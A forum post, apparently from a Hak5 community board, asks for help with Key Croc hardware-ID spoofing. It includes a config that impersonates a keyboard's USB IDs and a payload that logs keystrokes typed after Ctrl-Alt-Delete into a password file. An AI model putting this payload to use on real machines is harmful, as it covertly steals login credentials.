Jump to content

WizIs

Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by WizIs

  1. Hi,

    I am using 1.3_510 and HWID cloning AND hardware override isn't working. Below is my configuration. I read that ATTACKMODE may be able to help, so I added a payload.txt too.


    How should I go about to resolve this?


    ./config.txt:

    #!/bin/bash
    #######################################
    #      _-^^-_                         #
    #  ---=>====<^^..                     #
    #      "    "      Key Croc by Hak5   #
    #######################################
    #This configuration file is used to set default variables

    DUCKY_LANG us


    SSH ENABLE

    WIFI_SSID iPhone
    WIFI_PASS password

    VID VID_0X0A5C
    PID PID_0X3025

    ----

    ./payloads/win10_grab.txt

    ATTACKMODE STORAGE HID VID_0X0A5C PID_0X3025 MAN_LITE-ON SN_0 PROD_Keyboard
    MATCH \[CONTROL-ALT-DELETE\]
    SAVEKEYS /root/loot/password.log UNTIL \[ENTER\]

     

×
×
  • Create New...